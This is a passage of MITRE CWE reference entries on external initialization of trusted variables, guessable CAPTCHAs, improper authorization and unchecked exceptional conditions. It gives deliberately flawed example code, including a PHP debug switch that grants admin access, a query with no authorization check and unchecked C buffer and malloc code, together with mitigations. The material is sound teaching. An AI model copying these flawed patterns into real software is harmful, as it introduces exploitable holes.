2008-11-24Internal CWE Team
Modifications
Modification DateModifierOrganizationSource
2009-01-12CWE Content TeamMITREInternal
updated Name
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Likelihood_of_Exploit
2010-02-16CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Exposed Insecure Method or Function

CWE-454: External Initialization of Trusted Variables or Data Stores

Weakness ID: 454
Abstraction: Base
Status: Draft
+ Description

Description Summary

The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.

Extended Description

A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. They may have been initialized incorrectly. If an attacker can initialize the variable, then he/she can influence what the vulnerable system will do.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

PHP: (Sometimes)

Language-independent

Platform Notes

This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request.

+ Common Consequences
ScopeEffect
Integrity

Technical Impact: Modify application data

An attacker could gain access to and modify sensitive data or system information.

+ Demonstrative Examples

Example 1

In the Java example below, a system property controls the debug level of the application.

(Bad Code)
Example Language: Java 
int debugLevel = Integer.getInteger("com.domain.application.debugLevel").intValue();

If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases.

Example 2

This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set.

(Bad Code)
Example Language: PHP 
$debugEnabled = false;
if ($_POST["debug"] == "true"){
$debugEnabled = true;
}
/.../
function login($username, $password){
global $debugEnabled;
if($debugEnabled){
echo 'Debug Activated';
phpinfo();
$isAdmin = True;
return True;
}
}

Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system.

This example also exhibits Information Exposure Through Debug Information (CWE-215).

+ Observed Examples
ReferenceDescription
Does not clear dangerous environment variables, enabling symlink attack.
Specify alternate configuration directory in environment variable, enabling untrusted path.
Dangerous environment variable not cleansed.
Specify arbitrary modules using environment variable.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary.

Phase: Architecture and Design

Avoid any external control of variables. If necessary, restrict the variables that can be modified using a whitelist, and use a different namespace or naming convention if possible.
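
As a sketch of the whitelist idea (the field names and the usr_ prefix are illustrative assumptions):

(Good Code)
Example Language: PHP 
// Sketch: copy only expected, validated parameters into internal variables, using a
// distinct naming convention so externally supplied names cannot collide with them.
$allowed = array('firstname', 'lastname', 'email');
$profile = array();
foreach ($allowed as $key) {
if (isset($_POST[$key]) && is_string($_POST[$key])) {
$profile['usr_' . $key] = trim($_POST[$key]);
}
}
// Internal flags such as $debugEnabled are never derived from request data.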

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory452Initialization and Cleanup Errors
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class665Improper Initialization
Research Concepts (primary)1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
CanAlsoBeWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Relationship Notes

Overlaps Missing variable initialization, especially in PHP.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERExternal initialization of trusted variables or values
Software Fault PatternsSFP25Tainted input to variable
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes, Relationship_Notes
2010-02-16CWE Content TeamMITREInternal
updated Description, Name, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11External Initialization of Trusted Variables or Values
2010-02-16External Initialization of Trusted Variables

CWE-804: Guessable CAPTCHA

Weakness ID: 804
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.

Extended Description

An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.

There can be several different causes of a guessable CAPTCHA:

  • An audio or visual image that does not have sufficient distortion from the unobfuscated source image.

  • A question is generated with a format that can be automatically recognized, such as a math question.

  • A question for which the number of possible answers is limited, such as birth years or favorite sports teams.

  • A general-knowledge or trivia question for which the answer can be looked up in a database, such as country capitals or popular actors.

  • Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Sometimes)

+ Common Consequences
ScopeEffect
Access Control
Other

Technical Impact: Bypass protection mechanism; Other

When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA.

+ Likelihood of Exploit

Medium to High

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class287Improper Authentication
Development Concepts699
Research Concepts1000
ChildOfWeakness ClassWeakness Class330Use of Insufficiently Random Values
Development Concepts699
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
WASC21Insufficient Anti-Automation
+ References
Web Application Security Consortium. "Insufficient Anti-automation". <http://projects.webappsec.org/Insufficient+Anti-automation>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15MITREInternal CWE Team
New entry to handle anti-automation as identified in WASC.
Modifications
Modification DateModifierOrganizationSource
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships

CWE-285: Improper Authorization

Weakness ID: 285
Abstraction: Class
Status: Draft
+ Description

Description Summary

The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

Extended Description

Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.

+ Alternate Terms
AuthZ:

"AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is also distinct from "AuthC," which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Often)

Database-Server: (Often)

+ Modes of Introduction

A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.

Authorization weaknesses may arise when a single-user application is ported to a multi-user environment.

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data; Read files or directories

An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.

Integrity

Technical Impact: Modify application data; Modify files or directories

An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.

Access Control

Technical Impact: Gain privileges / assume identity

An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.

Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.

Effectiveness: Limited

Automated Dynamic Analysis

Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine whether the lack of authorization violates business logic.

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.

Effectiveness: Moderate

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Fuzz Tester

  • Framework-based Fuzzer

  • Forced Path Execution

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This function runs an arbitrary SQL query on a given database, returning the result of the query.

(Bad Code)
Example Language: PHP 
function runEmployeeQuery($dbName, $name){
global $globalDbHandle;
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName);
//Use a prepared statement to avoid CWE-89
$preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');
$preparedStatement->execute(array(':name' => $name));
return $preparedStatement->fetchAll();
}
/.../
$employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']);

While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.
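
For illustration only, one way to add such a check is sketched below; the session field and the isAuthorizedForEmployeeData() helper are hypothetical and would need to be backed by the application's own authorization data.

(Good Code)
Example Language: PHP 
// Sketch: confirm that the authenticated caller may read employee records
// before the query is ever run; isAuthorizedForEmployeeData() is hypothetical.
session_start();
if (!isset($_SESSION['username']) || !isAuthorizedForEmployeeData($_SESSION['username'])) {
die('Not authorized to query employee records');
}
$employeeRecord = runEmployeeQuery('EmployeeDB', $_GET['EmployeeName']);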

Example 2

The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.

(Bad Code)
Example Language: Perl 
sub DisplayPrivateMessage {
my($id) = @_;
my $Message = LookupMessageObject($id);
print "From: " . encodeHTML($Message->{from}) . "<br>\n";
print "Subject: " . encodeHTML($Message->{subject}) . "\n";
print "<hr>\n";
print "Body: " . encodeHTML($Message->{body}) . "\n";
}

my $q = new CGI;
# For purposes of this example, assume that CWE-309 and
# CWE-523 do not apply.
if (! AuthenticateUser($q->param('username'), $q->param('password'))) {
ExitError("invalid username or password");
}

my $id = $q->param('id');
DisplayPrivateMessage($id);

While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.

One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user.

+ Observed Examples
ReferenceDescription
Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.
Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.
Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.
Terminal server does not check authorization for guest access.
Database server does not use appropriate privileges for certain sensitive operations.
Gateway uses default "Allow" configuration for its authorization settings.
Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.
Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.
System monitoring software allows users to bypass authorization by creating custom forms.
Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.
Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.
Content management system does not check access permissions for private files, allowing others to view those files.
ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.
Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files.
Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.
Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.
OS kernel does not check for a certain privilege before setting ACLs for files.
Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.
Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.
+ Potential Mitigations

Phase: Architecture and Design

Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.

Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
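
A minimal sketch of such a role check in PHP, assuming a session-based login and a hypothetical currentUserHasRole() helper backed by the application's role store:

(Good Code)
Example Language: PHP 
// Sketch: enforce the role boundary before dispatching to privileged functionality.
session_start();
if (empty($_SESSION['user_id']) || !currentUserHasRole($_SESSION['user_id'], 'admin')) {
    http_response_code(403);
    exit("Access denied");
}
// ... administrative functionality follows ...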

Phase: Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using authorization frameworks such as the JAAS Authorization Framework [R.285.5] and the OWASP ESAPI Access Control feature [R.285.4].

Phase: Architecture and Design

For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.

One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
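
For example, a shared guard included at the top of every protected page can perform the session and permission checks in one place. The sketch below is PHP; the session keys and the userCanAccess() helper are illustrative assumptions.

(Good Code)
Example Language: PHP 
// auth_guard.php - include at the top of every sensitive page.
session_start();
header("Cache-Control: no-store");                 // keep sensitive pages out of caches
if (empty($_SESSION['user_id'])) {                  // no authenticated session
    header("Location: /login.php");
    exit;
}
if (!userCanAccess($_SESSION['user_id'], $_SERVER['SCRIPT_NAME'])) {
    http_response_code(403);                        // authenticated but not authorized
    exit("Access denied");
}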

Phases: System Configuration; Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

+ Background Details

An access control list (ACL) represents who or what has permissions to a given object. Different operating systems implement ACLs in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users, where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the UNIX concept of three classes of users to include a list of users and groups along with their associated permissions. A user can create an object (such as a file) and assign specified permissions to that object.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory254Security Features
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class284Improper Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory721OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7532009 Top 25 - Porous Defenses
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8032010 Top 25 - Porous Defenses
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory817OWASP Top Ten 2010 Category A8 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory935OWASP Top Ten 2013 Category A7 - Missing Function Level Access Control
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory945SFP Secondary Cluster: Insecure Resource Access
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant219Sensitive Data Under Web Root
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class732Incorrect Permission Assignment for Critical Resource
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class862Missing Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant926Improper Export of Android Application Components
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant927Use of Implicit Intent for Sensitive Communication
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMissing Access Control
OWASP Top Ten 2007A10CWE More SpecificFailure to Restrict URL Access
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
Software Fault PatternsSFP35Insecure resource access
+ References
[R.285.1] NIST. "Role Based Access Control and Role Based Security". <http://csrc.nist.gov/groups/SNS/rbac/>.
[R.285.2] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171. 2nd Edition. Microsoft. 2002.
[R.285.3] Frank Kim. "Top 25 Series - Rank 5 - Improper Access Control (Authorization)". SANS Software Security Institute. 2010-03-04. <http://blogs.sans.org/appsecstreetfighter/2010/03/04/top-25-series-rank-5-improper-access-control-authorization/>.
[R.285.4] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.285.5] [REF-23] Rahul Bhattacharjee. "Authentication using JAAS". <http://www.javaranch.com/journal/2008/04/authentication-using-JAAS.html>.
[R.285.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 2, "Common Vulnerabilities of Authorization", Page 39. 1st Edition. Addison Wesley. 2006.
[R.285.7] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 11, "ACL Inheritance", Page 649. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Description, Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Type
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Description
2011-03-24
(Critical)
CWE Content TeamMITREInternal
Changed name and description; clarified difference between "access control" and "authorization."
2011-03-29CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Name, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Missing or Inconsistent Access Control
2011-03-29Improper Access Control (Authorization)

CWE-754: Improper Check for Unusual or Exceptional Conditions

Weakness ID: 754
Abstraction: Class
Status: Incomplete
+ Description

Description Summary

The software does not check or improperly checks for unusual or exceptional conditions that are not expected to occur frequently during day-to-day operation of the software.

Extended Description

The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer's assumptions, possibly introducing instability, incorrect behavior, or a vulnerability.

Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Availability

Technical Impact: DoS: crash / exit / restart; Unexpected state

The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors.

+ Likelihood of Exploit

Medium

+ Detection Methods

Automated Static Analysis

Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules.

Effectiveness: Moderate

Manual Dynamic Analysis

Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself.

+ Demonstrative Examples

Example 1

Consider the following code segment:

(Bad Code)
Example Language: C 
char buf[10], cp_buf[10];
fgets(buf, 10, stdin);
strcpy(cp_buf, buf);

The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy().
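
Although the example above is C, the underlying rule (check what an I/O call actually reports before using its output) applies in any language. As a hedged analogue, PHP's fgets() returns false on error or end-of-file, and a minimal command-line sketch of checking it looks like:

(Good Code)
Example Language: PHP 
// Sketch: check the return value of fgets() before treating it as input.
$line = fgets(STDIN);
if ($line === false) {
    // error or end-of-file: $line is not valid input
    exit("No input available");
}
$copy = $line;   // safe to copy only after the check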

Example 2

The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().

(Bad Code)
Example Language: C 
buf = (char*) malloc(req_size);
strncpy(buf, xfer, req_size);

The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations:

  • Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue.

  • It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state.

  • The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know.

Example 3

The following examples read a file into a byte array.

(Bad Code)
Example Language: C# 
char[] byteArray = new char[1024];
for (IEnumerator i = users.GetEnumerator(); i.MoveNext(); ) {
String userName = (String) i.Current;
String pFileName = PFILE_ROOT + "/" + userName;
StreamReader sr = new StreamReader(pFileName);
sr.Read(byteArray, 0, 1024); // the file is always 1k bytes
sr.Close();
processPFile(userName, byteArray);
}
(Bad Code)
Example Language: Java 
byte[] byteArray = new byte[1024];
for (Iterator i = users.iterator(); i.hasNext();) {
String userName = (String) i.next();
String pFileName = PFILE_ROOT + "/" + userName;
FileInputStream fis = new FileInputStream(pFileName);
fis.read(byteArray); // the file is always 1k bytes
fis.close();
processPFile(userName, byteArray);
}
The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker.

Example 4

The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.

(Bad Code)
Example Language: Java 
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
...
}
...

The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.

(Bad Code)
Example Language: .NET 
String itemName = request.Item(ITEM_NAME);
if (itemName.Equals(IMPORTANT_ITEM)) {
...
}
...

The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved.
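
The analogous defensive check in PHP verifies that the request parameter is actually present before operating on it; the parameter name and constant below are illustrative.

(Good Code)
Example Language: PHP 
// Sketch: confirm the parameter exists before comparing it.
if (!isset($_GET['itemName'])) {
    exit("Missing itemName parameter");
}
if ($_GET['itemName'] === IMPORTANT_ITEM) {   // IMPORTANT_ITEM assumed to be a defined constant
    // ...
}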

Example 5

The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.

(Bad Code)
Example Language: Java 
System.clearProperty("os.name");
...
String os = System.getProperty("os.name");
if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported");

The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved.

Example 6

The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.

(Bad Code)
Example Language: .NET 
Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)
Dim MyArray(50) As Byte
MyFile.Read(MyArray, 0, 50)
DoDangerousOperation(MyArray(20))

In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested.
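
The same caveat applies to PHP's fread(), which may return fewer bytes than requested. A sketch of accumulating data until the expected amount is read (the filename and expected size are illustrative):

(Good Code)
Example Language: PHP 
// Sketch: keep reading until the expected number of bytes arrives or EOF is hit.
$expected = 1024;
$fh = fopen('pfile.dat', 'rb');
if ($fh === false) {
    exit("Unable to open file");
}
$data = '';
while (strlen($data) < $expected && !feof($fh)) {
    $chunk = fread($fh, $expected - strlen($data));
    if ($chunk === false) {
        break;                      // read error: stop and report below
    }
    $data .= $chunk;
}
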